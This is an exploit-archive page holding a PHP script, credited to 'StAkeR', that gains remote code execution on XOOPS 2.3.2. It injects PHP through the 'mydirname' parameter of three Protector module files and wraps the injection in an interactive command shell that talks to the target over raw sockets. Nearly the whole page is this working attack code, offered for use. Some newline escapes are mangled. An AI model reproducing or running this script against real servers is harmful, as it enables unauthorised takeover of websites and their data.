[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit
# Published : 2009-01-08
# Author : StAkeR
# Previous Title : Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
# Next Title : DMXReady Document Library Manager <= 1.1 Contents Change Vuln


#!/usr/bin/php -q
<?php

/****************************************************************
 * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *
 * by athos - staker[at]hotmail[dot]it                          *            
 * http://xoops.org                                             *           
 *                                                              *             
 * thanks to s3rg3770 and The:Paradox                           *            
 *                                                              *            
 * works with register globals on                               *            
 * note: this vuln is a remote php code execution               *              
 *                                                              *   
 * Directory (xoops_lib/modules/protector/)                     *
 * onupdate.php?mydirname=a(){} [PHP CODE] function v           *
 * oninstall.php?mydirname=a(){} [PHP CODE] function v          *
 * notification.php?mydirname=a(){} [PHP CODE] function v       *
 ****************************************************************/

error_reporting(0);

list($cli,$host,$path,$num) = $argv;

if ($argc != 4) {  
    
    print "n+--------------------------------------------------------------+n";
    print "r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    |n";    
    print "r+--------------------------------------------------------------+n";
    print "rby athos - staker[at]hotmail[dot]it / http://xoops.orgn";
    print "rUsage: php xpl.php [host] [path]nn";
    print "rhost     + localhostn";
    print "rpath     + /XOOPSn";
    exit;      
}         

exploit();

function exploit() {
    
    global $num;
    
    if ($num > 3) {
       die("n$num isn't a valid optionn");
    } 
    else {
       yeat_shell();
    }
}

    
function yeat_shell() {
    
    while (1) {
        echo "yeat[php-shell]~$: "; 
        $exec = stripslashes(trim(fgets(STDIN)));  
        
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("nExitedn");
        if (preg_match('/^(help|--help)$/i',$exec)) echo("nExample: uname -an");
        if (preg_match('/^(about|--about)$/i',$exec)) echo("nstaker[at]hotmail[dot]itn");

        print data_exec($exec);     
    }
}


function data_exec($exec) {
    
    global $host,$path,$num;
    
    if ($num == 1) {
        $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
    }
    
    if ($num == 2) {
        $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
    }
    
    if ($num == 3) {
        $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
    }
    
    $exec = urlencode($exec);
    $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1rn";
    $data .= "Host: {$host}rn";
    $data .= "User-Agent: Lynx (textmode)rn";
    $data .= "Connection: closernrn";
    
    $html = data_send ($host,$data);

    return $html;
}


function data_send ($host,$data) {
   
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused,try again!n");
    }   fputs($sock,$data);
    
    while (!feof($sock)) { $html .= fgets($sock); }
    
    fclose($sock);
    return $html;
}   

# www.Syue.com [2009-01-08]